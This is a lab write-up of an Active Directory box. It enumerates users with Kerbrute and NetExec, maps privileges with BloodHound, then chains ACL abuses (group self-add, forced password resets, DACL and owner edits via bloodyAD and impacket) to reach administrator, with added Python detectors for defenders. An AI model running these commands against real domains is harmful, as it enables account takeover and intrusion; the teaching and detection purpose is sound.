Information #
The PDF file provides the default username and password.
Nmap #
[root@Hacking] /home/kali/Evelator
❯ nmap 192.168.55.158 -A -p-
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-21 13:51:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bloodhound.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bloodhound.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
Add bloodhound.thl to /etc/hosts.
Kerbrute Userenum #
Enumerate users:
[root@Hacking] /home/kali/Evelator
❯ kerbrute userenum -d bloodhound.thl --dc 192.168.55.158 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/21/25 - Ronnie Flathers @ropnop
2025/08/21 21:56:12 > Using KDC(s):
2025/08/21 21:56:12 > 192.168.55.158:88
2025/08/21 21:56:14 > [+] VALID USERNAME: elevator@bloodhound.thl
2025/08/21 21:56:20 > [+] VALID USERNAME: john.smith@bloodhound.thl
2025/08/21 21:56:24 > [+] VALID USERNAME: michael.jones@bloodhound.thl
2025/08/21 21:56:56 > [+] VALID USERNAME: administrador@bloodhound.thl
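Every name Kerbrute probes above is an AS-REQ the domain controller answers, and for names that do not exist the KDC returns KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6), which the DC logs as an audit-failure event 4768. A sweep therefore looks like one client IP asking about many distinct unknown principals in a short window. The detector below is an added example written for this page, not something from the writeup or from Kerbrute; the event lines, the source addresses and the one-line summary format (field names taken from the 4768 schema, values invented) are constructed, and a real deployment would read the same fields from EVTX or a SIEM instead.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real DC logs). Each line summarises one Windows
# security event using the field names a 4768 record carries: TargetUserName,
# IpAddress and the Kerberos result Status. The invented source 192.168.55.100
# is sweeping a wordlist; 192.168.55.20 is a user who mistyped their name once.
SAMPLE_EVENTS = [
    "2025-08-21T21:56:12Z EventID=4768 TargetUserName=aaron IpAddress=::ffff:192.168.55.100 Status=0x6",
    "2025-08-21T21:56:12Z EventID=4768 TargetUserName=abby IpAddress=::ffff:192.168.55.100 Status=0x6",
    "2025-08-21T21:56:13Z EventID=4768 TargetUserName=adam IpAddress=::ffff:192.168.55.100 Status=0x6",
    "2025-08-21T21:56:13Z EventID=4768 TargetUserName=alex IpAddress=::ffff:192.168.55.100 Status=0x6",
    "2025-08-21T21:56:14Z EventID=4768 TargetUserName=elevator IpAddress=::ffff:192.168.55.100 Status=0x0",
    "2025-08-21T21:56:15Z EventID=4768 TargetUserName=amy IpAddress=::ffff:192.168.55.100 Status=0x6",
    "2025-08-21T21:56:16Z EventID=4768 TargetUserName=andy IpAddress=::ffff:192.168.55.100 Status=0x6",
    "2025-08-21T21:57:40Z EventID=4768 TargetUserName=john.smiht IpAddress=::ffff:192.168.55.20 Status=0x6",
    "2025-08-21T21:57:45Z EventID=4768 TargetUserName=john.smith IpAddress=::ffff:192.168.55.20 Status=0x0",
    "2025-08-21T22:10:00Z EventID=4771 TargetUserName=michael.jones IpAddress=::ffff:192.168.55.20 Status=0x18",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) Status=(?P<status>0x[0-9a-fA-F]+)$"
)

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6  # "client not found in Kerberos database"


def parse_event(line):
    """Parse one summary line into a dict, or return None if it does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "id": int(m["id"]),
        "user": m["user"],
        "ip": m["ip"],
        "status": int(m["status"], 16),
    }


def find_enumeration_bursts(lines, window_seconds=60, threshold=5):
    """Return {source_ip: [probed names]} for every source that asked the KDC
    about `threshold` or more *distinct* non-existent principals within
    `window_seconds`. One typo never trips this; a wordlist sweep does."""
    failures = defaultdict(list)  # ip -> [(timestamp, username), ...]
    for line in lines:
        ev = parse_event(line)
        if ev and ev["id"] == 4768 and ev["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[ev["ip"]].append((ev["ts"], ev["user"]))

    window = timedelta(seconds=window_seconds)
    hits = {}
    for ip, events in failures.items():
        events.sort()  # chronological; ties broken by name
        for i in range(len(events)):
            # Sliding window anchored at event i: collect distinct names inside it.
            names = {events[i][1]}
            j = i + 1
            while j < len(events) and events[j][0] - events[i][0] <= window:
                names.add(events[j][1])
                j += 1
            if len(names) >= threshold:
                hits[ip] = sorted({name for _, name in events})
                break
    return hits


if __name__ == "__main__":
    for ip, names in find_enumeration_bursts(SAMPLE_EVENTS).items():
        print(f"possible user enumeration from {ip}: {len(names)} unknown names, e.g. {names[:3]}")
```

Tune `window_seconds` and `threshold` to the site; the distinct-name count is what separates a sweep from a user repeatedly retrying one bad name.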
NetExec SMB #
[root@Hacking] /home/kali/Evelator
❯ NetExec smb 192.168.55.158 -u 'john.smith' -p 'Rk436\#Z4&' --shares
SMB 192.168.55.158 445 ELEVATOR [*] Windows Server 2022 Build 20348 x64 (name:ELEVATOR) (domain:bloodhound.thl) (signing:True) (SMBv1:False)
SMB 192.168.55.158 445 ELEVATOR [+] bloodhound.thl\john.smith:Rk436\#Z4&
SMB 192.168.55.158 445 ELEVATOR [*] Enumerated shares
SMB 192.168.55.158 445 ELEVATOR Share Permissions Remark
SMB 192.168.55.158 445 ELEVATOR ----- ----------- ------
SMB 192.168.55.158 445 ELEVATOR ADMIN$ Admin remota
SMB 192.168.55.158 445 ELEVATOR C$ Recurso predeterminado
SMB 192.168.55.158 445 ELEVATOR E$ Recurso predeterminado
SMB 192.168.55.158 445 ELEVATOR IPC$ READ IPC remota
SMB 192.168.55.158 445 ELEVATOR NETLOGON READ Recurso compartido del servidor de inicio de sesión
SMB 192.168.55.158 445 ELEVATOR SYSVOL READ Recurso compartido del servidor de inicio de sesión
[root@Hacking] /home/kali/Evelator
❯ NetExec smb 192.168.55.158 -u 'john.smith' -p 'Rk436\#Z4&' --rid-brute | grep SidTypeUser
SMB 192.168.55.158 445 ELEVATOR 500: BLOODHOUND\Administrador (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 501: BLOODHOUND\Invitado (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 502: BLOODHOUND\krbtgt (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1000: BLOODHOUND\ELEVATOR$ (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1108: BLOODHOUND\michael.jones (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1109: BLOODHOUND\john.smith (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1111: BLOODHOUND\mary.johnson (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1112: BLOODHOUND\robert.williams (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1114: BLOODHOUND\patricia.brown (SidTypeUser)
Bloodhound #
Collecting directly here seemed to cause DNS timeouts, so I stood up a fake resolver with dnschef.
[root@Hacking] /home/kali/Elevator
❯ dnschef --fakeip 192.168.55.158
[root@Hacking] /home/kali/Evelator
❯ bloodhound-python -u 'john.smith' -p 'Rk436\#Z4&' -d bloodhound.thl -dc dc.bloodhound.thl -ns 127.0.0.1 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.bloodhound.thl
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.bloodhound.thl
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: elevator.bloodhound.thl
INFO: Done in 00M 00S
INFO: Compressing output into 20250821223912_bloodhound.zip
BloodHound shows one path starting from SMITH, and it is very clear from top to bottom.
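What BloodHound draws is a directed graph whose edges are ACEs (AddSelf, GenericAll, ForceChangePassword, WriteDacl, WriteOwner) plus group memberships, and the "path" is a breadth-first search through it. The added example below (not code from the writeup or from BloodHound) rebuilds the graph for this box from constructed triples in BloodHound's (source, edge, target) shape, finds the shortest path from JOHN.SMITH to ADMINISTRATORS, and then answers the question a defender actually has: which single ACEs, if removed, break the path. One FINANZAS -> ROBERT.WILLIAMS edge is invented so the graph has an alternative route; the rest mirrors the chain in the writeup, and all node names are assumptions rather than exported data.

```python
from collections import defaultdict, deque

# Constructed edge list in the (source, edge kind, target) shape of a BloodHound export.
# Nodes and most edges mirror the chain in this writeup; the FINANZAS -> ROBERT.WILLIAMS
# edge is invented so that the graph has one alternative route. None of this is real data.
EDGES = [
    ("JOHN.SMITH", "AddSelf", "FINANZAS"),
    ("FINANZAS", "GenericAll", "MARY.JOHNSON"),
    ("FINANZAS", "ForceChangePassword", "ROBERT.WILLIAMS"),   # invented second route
    ("MARY.JOHNSON", "ForceChangePassword", "ROBERT.WILLIAMS"),
    ("ROBERT.WILLIAMS", "WriteDacl", "PATRICIA.BROWN"),
    ("PATRICIA.BROWN", "WriteOwner", "OPERACIONES"),
    ("OPERACIONES", "GenericAll", "MICHAEL.JONES"),
    ("MICHAEL.JONES", "MemberOf", "ADMINISTRATORS"),
    ("MICHAEL.JONES", "CanPSRemote", "ELEVATOR.BLOODHOUND.THL"),
    ("JOHN.SMITH", "MemberOf", "DOMAIN USERS"),
]

# Edge kinds that come from an ACE granting control over another object.
# Membership and session edges are real relationships, not misconfigured ACEs.
DANGEROUS = {
    "AddSelf", "AddMember", "GenericAll", "GenericWrite", "WriteDacl",
    "WriteOwner", "Owns", "ForceChangePassword", "AllExtendedRights",
}


def shortest_path(edges, start, goal):
    """Breadth-first search; returns the path as a list of (src, kind, dst)
    triples, or None when goal is unreachable from start."""
    adj = defaultdict(list)
    for src, kind, dst in edges:
        adj[src].append((kind, dst))
    parent = {start: None}  # node -> (previous node, edge kind used)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for kind, nxt in adj[node]:
            if nxt not in parent:
                parent[nxt] = (node, kind)
                queue.append(nxt)
    if goal not in parent:
        return None
    path, node = [], goal
    while parent[node] is not None:
        prev, kind = parent[node]
        path.append((prev, kind, node))
        node = prev
    return path[::-1]


def single_point_cuts(edges, start, goal):
    """Return the dangerous ACE edges whose removal alone disconnects goal from
    start, in edge-list order. These are the cheapest remediations: fix any one
    of them and the whole chain is gone; edges with a bypass are not listed."""
    cuts = []
    for edge in edges:
        if edge[1] not in DANGEROUS:
            continue
        remaining = [e for e in edges if e != edge]
        if shortest_path(remaining, start, goal) is None:
            cuts.append(edge)
    return cuts


if __name__ == "__main__":
    path = shortest_path(EDGES, "JOHN.SMITH", "ADMINISTRATORS")
    for src, kind, dst in path:
        print(f"{src} --{kind}--> {dst}")
    print("single ACEs whose removal breaks the path:")
    for src, kind, dst in single_point_cuts(EDGES, "JOHN.SMITH", "ADMINISTRATORS"):
        print(f"  remove {kind} granted to {src} on {dst}")
```

On a real export the same two functions apply unchanged; the interesting output is the difference between the path BloodHound shows and the much shorter list of ACEs that are true choke points.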
Addself To FINANZAS #
[root@Hacking] /home/kali/Evelator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'john.smith' -p 'Rk436\#Z4&' add groupMember FINANZAS john.smith
[+] john.smith added to FINANZAS
GenericAll To MARY #
Change mary's password.
[root@Hacking] /home/kali/Evelator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'john.smith' -p 'Rk436\#Z4&' set password MARY.JOHNSON Abc123456@
[+] Password changed successfully!
ForceChangePassword To ROBERT #
[root@Hacking] /home/kali/Evelator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'mary.johnson' -p 'Abc123456@' set password ROBERT.WILLIAMS Abc123456@
[+] Password changed successfully!
WriteDacl #
[root@Hacking] /home/kali/Evelator
❯ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ROBERT.WILLIAMS' -target 'PATRICIA.BROWN' 'bloodhound.thl/ROBERT.WILLIAMS:Abc123456@'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250821-224850.bak
[*] DACL modified successfully!
ChangePassword To PATRICIA #
[root@Hacking] /home/kali/Elevator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'ROBERT.WILLIAMS' -p 'Abc123456@' set password PATRICIA.BROWN Abc123456@
[+] Password changed successfully!
WriteOwner To OPERACIONES #
Change the owner.
[root@Hacking] /home/kali/Elevator
❯ impacket-owneredit -action write -new-owner 'PATRICIA.BROWN' -target 'OPERACIONES' 'bloodhound.thl/PATRICIA.BROWN:Abc123456@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-3580157585-956322742-780763674-1114
[*] - sAMAccountName: patricia.brown
[*] - distinguishedName: CN=Patricia Brown,CN=Users,DC=bloodhound,DC=thl
[*] OwnerSid modified successfully!
Add write permission.
[root@Hacking] /home/kali/Elevator
❯ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'PATRICIA.BROWN' -target-dn 'CN=OPERACIONES,OU=OPERACIONES,DC=BLOODHOUND,DC=THL' 'bloodhound.thl/PATRICIA.BROWN:Abc123456@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250821-230110.bak
[*] DACL modified successfully!
Add myself to this group.
[root@Hacking] /home/kali/Elevator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'PATRICIA.BROWN' -p 'Abc123456@' add groupMember OPERACIONES PATRICIA.BROWN
[+] PATRICIA.BROWN added to OPERACIONES
GenericAll To MICHAEL #
[root@Hacking] /home/kali/Elevator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'PATRICIA.BROWN' -p 'Abc123456@' set password MICHAEL.JONES Abc123456@
[+] Password changed successfully!
USER && ROOT #
MICHAEL can log in via WinRM and is in the administrators group, so we can go straight to the administrator desktop and grab the flag.
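Every step of the chain above lands in the domain controller's security log: a group self-add is event 4728 (global group) or 4732 (local group), each bloodyAD `set password` is a 4724 password reset, and dacledit/owneredit write `nTSecurityDescriptor`, which with Directory Service Changes auditing enabled (and a SACL on the object) shows up as 5136. What makes the sequence distinctive is that the subject of each event is the target of an earlier reset in the same run. The added example below (my code, not the writeup's or any tool's) correlates constructed, simplified event records on exactly that property; the dict field names are my own, the timestamps and the helpdesk noise are invented, and the event IDs and the attribute name are the real ones.

```python
# Real Windows security event IDs; the record layout and values below are constructed.
PASSWORD_RESET = 4724          # "An attempt was made to reset an account's password"
GROUP_ADD = {4728, 4732}       # member added to a global / local security group
DS_OBJECT_MODIFIED = 5136      # "A directory service object was modified"
SD_ATTRIBUTE = "nTSecurityDescriptor"  # DACL and owner both live in this attribute

SAMPLE_EVENTS = [
    {"time": "2025-08-21T22:40:01", "id": 4728, "subject": "john.smith", "target": "FINANZAS"},
    {"time": "2025-08-21T22:42:10", "id": 4724, "subject": "john.smith", "target": "mary.johnson"},
    {"time": "2025-08-21T22:45:32", "id": 4724, "subject": "mary.johnson", "target": "robert.williams"},
    {"time": "2025-08-21T22:48:50", "id": 5136, "subject": "robert.williams",
     "target": "CN=Patricia Brown,CN=Users,DC=bloodhound,DC=thl", "attribute": SD_ATTRIBUTE},
    {"time": "2025-08-21T22:50:05", "id": 4724, "subject": "robert.williams", "target": "patricia.brown"},
    {"time": "2025-08-21T22:58:00", "id": 5136, "subject": "patricia.brown",
     "target": "CN=OPERACIONES,OU=OPERACIONES,DC=BLOODHOUND,DC=THL", "attribute": SD_ATTRIBUTE},
    {"time": "2025-08-21T23:01:10", "id": 5136, "subject": "patricia.brown",
     "target": "CN=OPERACIONES,OU=OPERACIONES,DC=BLOODHOUND,DC=THL", "attribute": SD_ATTRIBUTE},
    {"time": "2025-08-21T23:03:00", "id": 4728, "subject": "patricia.brown", "target": "OPERACIONES"},
    {"time": "2025-08-21T23:05:00", "id": 4724, "subject": "patricia.brown", "target": "michael.jones"},
    # Constructed noise: a routine helpdesk reset, and an attribute edit that is not an SD change.
    {"time": "2025-08-21T09:00:00", "id": 4724, "subject": "helpdesk.op", "target": "someone.else"},
    {"time": "2025-08-21T22:55:00", "id": 5136, "subject": "patricia.brown",
     "target": "CN=Patricia Brown,CN=Users,DC=bloodhound,DC=thl", "attribute": "description"},
]


def is_sensitive(ev):
    """Keep resets, group adds, and security-descriptor writes; drop everything else."""
    if ev["id"] == PASSWORD_RESET or ev["id"] in GROUP_ADD:
        return True
    return ev["id"] == DS_OBJECT_MODIFIED and ev.get("attribute") == SD_ATTRIBUTE


def reconstruct_takeover_chains(events, allowlist=frozenset(), min_subjects=2):
    """Group sensitive events into chains rooted at the account that started them.

    A 4724 by account A on account B hands B to A's chain; any later sensitive
    action performed *by* B is attributed to the same root. Chains in which fewer
    than `min_subjects` distinct accounts acted are dropped as ordinary admin work.
    Returns {root_account: [events in time order]}.
    """
    root_of = {}   # account (lower-case) -> root account of the chain that reset it
    chains = {}    # root account -> list of events
    for ev in sorted(events, key=lambda e: e["time"]):
        subject = ev["subject"].lower()
        if subject in allowlist or not is_sensitive(ev):
            continue
        root = root_of.get(subject, subject)
        chains.setdefault(root, []).append(ev)
        if ev["id"] == PASSWORD_RESET:
            # Whoever is behind `root` now controls the reset account too.
            root_of[ev["target"].lower()] = root
    return {
        root: evs for root, evs in chains.items()
        if len({e["subject"].lower() for e in evs}) >= min_subjects
    }


def reset_targets(chain):
    """Accounts taken over in a chain, in the order their passwords were reset."""
    return [e["target"] for e in chain if e["id"] == PASSWORD_RESET]


if __name__ == "__main__":
    for root, chain in reconstruct_takeover_chains(SAMPLE_EVENTS, allowlist={"helpdesk.op"}).items():
        print(f"chain rooted at {root}: {len(chain)} events, accounts taken over: {reset_targets(chain)}")
        for e in chain:
            print(f"  {e['time']} {e['id']} {e['subject']} -> {e['target']}")
```

The allowlist exists for accounts whose job is resetting passwords; without it a helpdesk reset still does not produce a chain here, because the reset account never goes on to act, but on a busy domain it would add noise to every root.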